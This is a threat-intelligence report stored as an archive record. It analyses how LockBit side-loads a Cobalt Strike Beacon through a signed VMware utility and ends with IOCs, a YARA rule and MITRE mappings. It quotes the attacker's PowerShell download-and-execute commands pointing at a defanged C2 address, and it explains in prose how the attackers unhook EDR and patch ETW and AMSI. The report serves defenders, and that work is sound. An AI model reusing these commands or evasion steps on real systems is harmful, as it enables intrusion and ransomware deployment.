{ "id": "392c2436-c5f9-4514-8776-661d75aabdda", "created_at": "2026-04-06T00:17:20.650834Z", "updated_at": "2026-04-10T03:37:51.37615Z", "deleted_at": null, "sha1_hash": "275f377e78b3547467560b13fe13c85a79695841", "title": "LockBit Ransomware Side-loads Cobalt Strike Beacon with Legitimate VMware Utility", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 9853050, "plain_text": "LockBit Ransomware Side-loads Cobalt Strike Beacon with\r\nLegitimate VMware Utility\r\nBy James Haughom\r\nPublished: 2022-04-27 · Archived: 2026-04-05 16:24:07 UTC\r\nBy James Haughom, Júlio Dantas, and Jim Walter\r\nExecutive Summary\r\nThe VMware command line utility VMwareXferlogs.exe used for data transfer to and from VMX logs is\r\nsusceptible to DLL side-loading.\r\nDuring a recent investigation, our DFIR team discovered that LockBit Ransomware-as-a-Service (Raas)\r\nside-loads Cobalt Strike Beacon through a signed VMware xfer logs command line utility.\r\nThe threat actor uses PowerShell to download the VMware xfer logs utility along with a malicious DLL,\r\nand a .log file containing an encrypted Cobalt Strike Reflective Loader.\r\nThe malicious DLL evades defenses by removing EDR/EPP’s userland hooks, and bypasses both Event\r\nTracing for Windows (ETW) and Antimalware Scan Interface (AMSI).\r\nThere are suggestions that the side-loading functionality was implemented by an affiliate rather than the\r\nLockbit developers themselves (via vx-underground), likely DEV-0401.\r\nOverview\r\nLockBit is a Ransomware as a Service (RaaS) operation that has been active since 2019 (previously known as\r\n“ABCD”). It commonly leverages the double extortion technique, employing tools such as StealBit, WinSCP, and\r\ncloud-based backup solutions for data exfiltration prior to deploying the ransomware. Like most ransomware\r\ngroups, LockBit’s post-exploitation tool of choice is Cobalt Strike.\r\nDuring a recent investigation, our DFIR team discovered an interesting technique used by LockBit Ransomware\r\nGroup, or perhaps an affiliate, to load a Cobalt Strike Beacon Reflective Loader. In this particular case, LockBit\r\nmanaged to side-load Cobalt Strike Beacon through a signed VMware xfer logs command line utility.\r\nSince our initial publication of this report, we have identified a connection with an affiliate Microsoft tracks as\r\nDEV-0401. A switch to LockBit represents a notable departure in DEV-0401’s previously observed TTPs.\r\nSide-loading is a DLL-hijacking technique used to trick a benign process into loading and executing a malicious\r\nDLL by placing the DLL alongside the process’ corresponding EXE, taking advantage of the DLL search order. In\r\nthis instance, the threat actor used PowerShell to download the VMware xfer logs utility along with a malicious\r\nDLL, and a .log file containing an encrypted Cobalt Strike Reflective Loader. The VMware utility was then\r\nexecuted via cmd.exe , passing control flow to the malicious DLL.\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 1 of 16\n\nThe DLL then proceeded to evade defenses by removing EDR/EPP’s userland hooks, as well as bypassing both\r\nEvent Tracing for Windows (ETW) and Antimalware Scan Interface (AMSI). The .log file was then loaded in\r\nmemory and decrypted via RC4, revealing a Cobalt Strike Beacon Reflective Loader. Lastly, a user-mode\r\nAsynchronous Procedure Call (APC) is queued, which is used to pass control flow to the decrypted Beacon.\r\nAttack Chain\r\nThe attack chain began with several PowerShell commands executed by the threat actor to download three\r\ncomponents, a malicious DLL, a signed VMwareXferlogs executable, and an encrypted Cobalt Strike payload in\r\nthe form of a .log file.\r\nFilename Description\r\nglib-2.0.dll Weaponized DLL loaded by VMwareXferlogs.exe\r\nVMwareXferlogs.exe Legitimate/signed VMware command line utility\r\nc0000015.log Encrypted Cobalt Strike payload\r\nOur DFIR team recovered the complete PowerShell cmdlets used to download the components from forensic\r\nartifacts.\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 2 of 16\n\nInvoke-WebRequest -uri hxxp://45.32.108[.]54:443/glib-2.0.dll -OutFile c:\\windows\\debug\\glib-2.0.dll\r\nInvoke-WebRequest -uri hxxp://45.32.108[.]54:443/c0000015.log -OutFile c:\\windows\\debug\\c0000015.log\r\nInvoke-WebRequest -uri hxxp://45.32.108[.]54:443/VMwareXferlogs.exe -OutFile c:\\windows\\debug\\VMwareX\r\nThe downloaded binary ( VMwareXferlogs.exe ) was then executed via the command prompt, with the STDOUT\r\nbeing redirected to a file.\r\nc:\\windows\\debug\\VMwareXferlogs.exe 1\u003e\r\n\\\\127.0.0.1\\ADMIN$\\__1649832485.0836577 2\u003e\u00261\r\nThe VMwareXferlogs.exe is a legitimate, signed executable belonging to VMware.\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 3 of 16\n\nVirusTotal Signature Summary\r\nThis utility is used to transfer data to and from VMX logs.\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 4 of 16\n\nVMware xfer utility command line usage\r\nThis command line utility makes several calls to a third party library called glib-2.0.dll . Both the utility and a\r\nlegitimate version of glib-2.0.dll are shipped with VMware installations.\r\nglib-2.0.dll functions being called by VMwareXferlog.exe\r\nThe weaponized glib-2.0.dll downloaded by the threat actor exports all the necessary functions imported by\r\nVMwareXferlog.exe .\r\nExported functions of malicious glib-2.0.dll\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 5 of 16\n\nglib-2.0.dll-related functions imported by VMwareXferlog.exe\r\nCalls to exported functions from glib-2.0.dll are made within the main function of the VMware utility, the\r\nfirst being g_path_get_basename() .\r\nglib-2.0.dll functions being called by VMwareXferlog.exe\r\nNote that the virtual addresses for the exported functions are all the same for the weaponized glib-2.0.dll\r\n(0x1800020d0), except for g_path_get_basename , which has a virtual address of 0x180002420. This is due to\r\nthe fact that all exports, except for the g_path_get_basename function do nothing other than call\r\nExitProcess() .\r\ng_error_free() function’s logic\r\nOn the other hand, g_path_get_basename() invokes the malicious payload prior to exiting.\r\nWhen VMwareXferlog.exe calls this function, control flow is transferred to the malicious glib-2.0.dll , rather\r\nthan the legitimate one, completing the side-loading attack.\r\ng_path_get_basename() being called in the main() function\r\nOnce control flow is passed to the weaponized DLL, the presence of a debugger is checked by querying the\r\nBeingDebugged flag and NtGlobalFlag in the Process Environment Block (PEB). If a debugger is detected, the\r\nmalware enters an endless loop.\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 6 of 16\n\nAnti-debug mechanisms\r\nBypassing EDR/EPP Userland Hooks\r\nAt this juncture, the malware enters a routine to bypass any userland hooks by manually mapping itself into\r\nmemory, performing a byte-to-byte inspection for any discrepancies between the copy of self and itself, and then\r\noverwriting any sections that have discrepancies.\r\nThis routine is repeated for all loaded modules, thus allowing the malware to identify any potential userland hooks\r\ninstalled by EDR/EPP, and overwrite them with the unpatched/unhooked code directly from the modules’ images\r\non disk.\r\nChecking for discrepancies between on-disk and in-memory for each loaded module\r\nFor example, EDR’s userland NT layer hooks may be removed with this technique. The below subroutine shows a\r\ntrampoline where a SYSCALL stub would typically reside, but instead jumps to a DLL injected by EDR. This\r\nsubroutine will be overwritten/restored to remove the hook.\r\nEDR-hooked SYSCALL stub that will be patched\r\nHere is a look at the patched code to restore the original SYSCALL stub and remove the EDR hook.\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 7 of 16\n\nNT layer hook removed and original code restored\r\nOnce these hooks are removed, the malware continues to evade defenses. Next, an attempt to bypass Event\r\nTracing for Windows (ETW) commences through patching the EtwEventWrite WinAPI with a RET instruction\r\n(0xC3), stopping any useful ETW-related telemetry from being generated related to this process.\r\nEvent Tracing for Windows bypass\r\nAMSI is bypassed the same way as ETW through patching AmsiScanBuffer . This halts AMSI from inspecting\r\npotentially suspicious buffers within this process.\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 8 of 16\n\nAMSI bypass\r\nOnce these defenses have been bypassed, the malware proceeds to execute the final payload. The final payload is\r\na Cobalt Strike Beacon Reflective Loader that is stored RC4-encrypted in the previously mentioned\r\nc0000015.log file. The RC4 Key Scheduling Algorithm can be seen below with the hardcoded 136 byte key.\r\n\u0026.5 \\C3%YHO2SM-\u0026B3!XSY6SV)6(\u00267;(3.'\r\n$F2WAED\u003e\u003e;K]8\\*D\r\nHERIP:45:X(WN8[?3Y\u003eXCWNPOL89\u003e[.# Q'\r\n4CP8M-%4N[7.$R-\u003e-1)$!NU\"W$!YT\u003cJ$V[\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 9 of 16\n\nRC4 Key Scheduling Algorithm\r\nThe RC4 decryption of the payload then commences.\r\nRC4 decryption routine\r\nThe final result is Beacon’s Reflective Loader, seen below with the familiar magic bytes and hardcoded strings.\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 10 of 16\n\nDecrypted Cobalt Strike Beacon Reflective Loader\r\nOnce decrypted, the region of memory that the payload resides in is made executable\r\n(PAGE_EXECUTE_READWRITE), and a new thread is created for this payload to run within.\r\nThis thread is created in a suspended state, allowing the malware to add a user-mode APC, pointing to the\r\npayload, to the newly created thread’s APC queue. Finally, the thread is resumed, allowing the thread to run and\r\nexecute the Cobalt Strike payload via the APC.\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 11 of 16\n\nLogic to queue and execute user-mode APC\r\nThe DLL is detected by the SentinelOne agent prior to being loaded and executed.\r\nDetection for LockBit DLL\r\nVMware Side-loading Variants\r\nA handful of samples related to the malicious DLL were discovered by our investigation. The only notable\r\ndifferences being the RC4 key and name of the file containing the RC4-encrypted payload to decrypt.\r\nFor example, several of the samples attempt to load the file vmtools.ini rather than c0000015.log .\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 12 of 16\n\nThe vmtools.ini file being accessed by a variant\r\nAnother variant shares the same file name to load vmtools.ini , yet is packed with a custom version of UPX.\r\nTail jump at the end of the UPX unpacking stub\r\nConclusion\r\nThe VMware command line utility VMwareXferlogs.exe used for data transfer to and from VMX logs is\r\nsusceptible to DLL side-loading. In our engagement, we saw that the threat actor had created a malicious version\r\nof the legitimate glib-2.0.dll to only have code within the g_path_get_basename() function, while all other\r\nexports simply called ExitProcess() . This function invokes a malicious payload which, among other things,\r\nattempts to bypass EDR/EPP userland hooks and engages in anti-debugging logic.\r\nLockBit continues to be a successful RaaS and the developers are clearly innovating in response to EDR/EPP\r\nsolutions. We hope that by describing this latest technique, defenders and security teams will be able to improve\r\ntheir ability to protect their organizations.\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 13 of 16\n\nIndicators of Compromise\r\nSHA1 Description\r\n729eb505c36c08860c4408db7be85d707bdcbf1b Malicious glib-2.0.dll from investigation\r\n091b490500b5f827cc8cde41c9a7f68174d11302 Decrypted Cobalt Strike payload\r\ne35a702db47cb11337f523933acd3bce2f60346d Encrypted Cobalt Strike payload – c0000015.log\r\n25fbfa37d5a01a97c4ad3f0ee0396f953ca51223 glib-2.0.dll vmtools.ini variant\r\n0c842d6e627152637f33ba86861d74f358a85e1f glib-2.0.dll vmtools.ini variant\r\n1458421f0a4fe3acc72a1246b80336dc4138dd4b glib-2.0.dll UPX-packed vmtools.ini variant\r\nFile Path Description\r\nc:\\windows\\debug\\VMwareXferlogs.exe Full path to legitimate VMware command line utility\r\nc:\\windows\\debug\\glib-2.0.dll Malicious DLL used for hijack\r\nc:\\windows\\debug\\c0000015.log Encrypted Cobalt Strike reflective loader\r\nC2 Description\r\n149.28.137[.]7 Cobalt Strike C2\r\n45.32.108[.]54 Attacker C2\r\nYARA Hunting Rules\r\nimport \"pe\"\r\nrule Weaponized_glib2_0_dll\r\n{\r\nmeta:\r\ndescription = \"Identify potentially malicious versions of glib-2.0.dll\"\r\nauthor = \"James Haughom @ SentinelOne\"\r\ndate = \"2022-04-22\"\r\nreference = \"https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-st\r\ncondition:\r\npe.characteristics \u0026 pe.DLL and pe.number_of_signatures == 0 and\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 14 of 16\n\npe.exports(\"g_path_get_basename\") and\r\npe.exports(\"g_error_free\") and\r\npe.exports(\"g_free\") and\r\npe.exports(\"g_option_context_add_main_entries\") and\r\npe.exports(\"g_option_context_get_help\") and\r\npe.exports(\"g_option_context_new\") and\r\npe.exports(\"g_print\") and\r\npe.exports(\"g_printerr\") and\r\npe.exports(\"g_set_prgname\") and\r\npe.exports(\"g_option_context_free\") and\r\npe.exports(\"g_option_context_parse\") and\r\npe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_\r\npe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_\r\npe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_\r\npe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_\r\npe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_\r\npe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_\r\npe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_\r\npe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_\r\npe.export_details[pe.exports_index(\"g_free\")].offset == pe.export_details[pe.exports_\r\npe.export_details[pe.exports_index(\"g_free\")].offset != pe.export_details[pe.exports_\r\npe.number_of_exports \u003c 15\r\n}\r\nMITRE ATT\u0026CK TTPs\r\nTTP MITRE ID\r\nEncrypted Cobalt Strike payload T1027\r\nDLL Hijacking T1574\r\nETW Bypass T1562.002\r\nAMSI Bypass T1562.002\r\nUnhooking EDR T1562.001\r\nEncrypted payload T1027.002\r\nPowershell usage T1059.001\r\nCobalt Strike S0154\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 15 of 16\n\nSource: https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/" ], "report_names": [ "lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f63c346d-18c8-4821-a56d-fefb1ad7ed5d", "created_at": "2022-10-25T16:07:23.42507Z", "updated_at": "2026-04-10T02:00:04.593122Z", "deleted_at": null, "main_name": "Bronze Starlight", "aliases": [ "Cinnamon Tempest", "DEV-0401", "HighGround", "Operation ChattyGoblin", "SLIME34" ], "source_name": "ETDA:Bronze Starlight", "tools": [ "Agent.dhwf", "Agentemis", "AtomSilo", "Cobalt Strike", "CobaltStrike", "Destroy RAT", "DestroyRAT", "HUI Loader", "Kaba", "Korplug", "LockFile", "Night Sky", "NightSky", "Pandora", "PlugX", "RedDelta", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Xamtrav", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "c69bcda3-0893-4ea1-9ec1-ae016332d283", "created_at": "2023-01-06T13:46:39.410593Z", "updated_at": "2026-04-10T02:00:03.317754Z", "deleted_at": null, "main_name": "BRONZE STARLIGHT", "aliases": [ "DEV-0401", "Cinnamon Tempest", "Emperor Dragonfly", "SLIME34" ], "source_name": "MISPGALAXY:BRONZE STARLIGHT", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d511e74b-96b8-4ab9-88d6-bc183351dbd8", "created_at": "2025-08-07T02:03:24.674685Z", "updated_at": "2026-04-10T02:00:03.800936Z", "deleted_at": null, "main_name": "BRONZE STARLIGHT", "aliases": [ "Cinnamon Tempest ", "DEV-0401 ", "Emperor Dragonfly " ], "source_name": "Secureworks:BRONZE STARLIGHT", "tools": [ "AtomSilo", "Cobalt Strike", "HUI Loader", "Impacket", "LockFile", "NightSky", "Pandora", "PlugX", "Rook" ], "source_id": "Secureworks", "reports": null }, { "id": "81e29474-63ad-4ce8-97db-b1712d5481d5", "created_at": "2024-04-24T02:00:49.570158Z", "updated_at": "2026-04-10T02:00:05.285111Z", "deleted_at": null, "main_name": "Cinnamon Tempest", "aliases": [ "Cinnamon Tempest", "DEV-0401", "Emperor Dragonfly", "BRONZE STARLIGHT" ], "source_name": "MITRE:Cinnamon Tempest", "tools": [ "Pandora", "PlugX", "Cheerscrypt", "Impacket", "Cobalt Strike", "HUI Loader", "Rclone" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434640, "ts_updated_at": 1775792271, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/275f377e78b3547467560b13fe13c85a79695841.pdf", "text": "https://archive.orkl.eu/275f377e78b3547467560b13fe13c85a79695841.txt", "img": "https://archive.orkl.eu/275f377e78b3547467560b13fe13c85a79695841.jpg" } }